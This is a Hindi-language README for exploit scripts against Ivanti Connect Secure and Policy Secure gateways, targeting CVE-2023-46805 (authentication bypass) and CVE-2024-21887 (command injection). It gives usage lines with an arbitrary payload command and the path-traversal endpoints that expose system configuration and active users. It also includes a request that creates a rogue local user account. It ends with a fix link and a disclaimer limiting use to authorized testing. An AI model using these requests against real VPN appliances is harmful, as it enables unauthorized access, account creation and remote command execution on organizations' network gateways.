
Ivanti ICS 9.x, 22.x और Ivanti Policy Secure के वेब घटक में एक प्रमाणीकरण बाईपास कमजोरी एक दूरस्थ हमलावर को नियंत्रण जांचों को बाईपास करके प्रतिबंधित संसाधनों तक पहुंचने की अनुमति देती है।
Ivanti ICS 9.x, 22.x और Ivanti Policy Secure के वेब घटक में एक प्रमाणीकरण बाईपास भेद्यता, जो एक दूरस्थ हमलावर को नियंत्रण जांचों को बायपास करके प्रतिबंधित संसाधनों तक पहुंचने की अनुमति देती है।
उपयोग: ./CVE-2023-46805.sh http(s)://fqdn:port
./CVE-2023-46805.sh https://my.vpn.ip:443

नोट्स:
chmod +x CVE-2023-46805.sh
एप्लिकेशन curl + json_pp की आवश्यकता है
परिणाम यदि असुरक्षित है, तो आपको कुछ चीज़ें देखनी चाहिए:

Ivanti Connect Secure (9.x, 22.x) और Ivanti Policy Secure के वेब घटकों में एक कमांड इंजेक्शन भेद्यता, जो एक प्रमाणित प्रशासक को विशेष रूप से तैयार अनुरोध भेजने और उपकरण पर मनमाने कमांड निष्पादित करने की अनुमति देती है।
उपयोग: ./CVE-2024-21887.sh http(s)://fqdn:port payload_cmd
./CVE-2024-21887.sh https://my.vpn.ip:443 "touch /tmp/pwned"
परिणाम यदि असुरक्षित है, तो आपको कुछ चीज़ें देखनी चाहिए और आपका पेलोड काम करना चाहिए:

नोट्स:
chmod +x CVE-2024-21887.sh
एप्लिकेशन curl, xxd, tr & sed की आवश्यकता है
/api/v1/totp/user-backup-code/../../configuration/system/configuration /api/v1/totp/user-backup-code/../../system/active-users
/api/v1/totp/user-backup-code/../../configuration/administrators/admin-realms/realm/Admin%20Users
-खाता बनाएं /authentication/auth-servers/authserver/System%20Local/local/users/user
-H 'Content-Type:application/json' -d '{"change-password-at-signin": "false", "consoleaccess": "false", "enabled": "true", "fullname": "new user", "one-timeuse": "false", "password-cleartext": "new_password", "username": "login_user"}'
कार्य-समाधान/सुधार: https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
श्रेय: https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis
मेरे बारे में और अधिक ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ अस्वीकरण: महत्वपूर्ण: यह स्क्रिप्ट केवल शैक्षिक, नैतिक परीक्षण और कानूनी उपयोग के लिए प्रदान की गई है। इसका उपयोग किसी भी सिस्टम या नेटवर्क पर स्पष्ट अनुमति के बिना न करें। कंप्यूटर सिस्टम और नेटवर्क तक अनधिकृत पहुंच अवैध है, और अनधिकृत गतिविधियाँ करते पकड़े जाने वाले उपयोगकर्ता कानूनी कार्रवाई के अधीन हैं। लेखक इस स्क्रिप्ट के दुरुपयोग से होने वाली किसी भी क्षति के लिए जिम्मेदार नहीं है।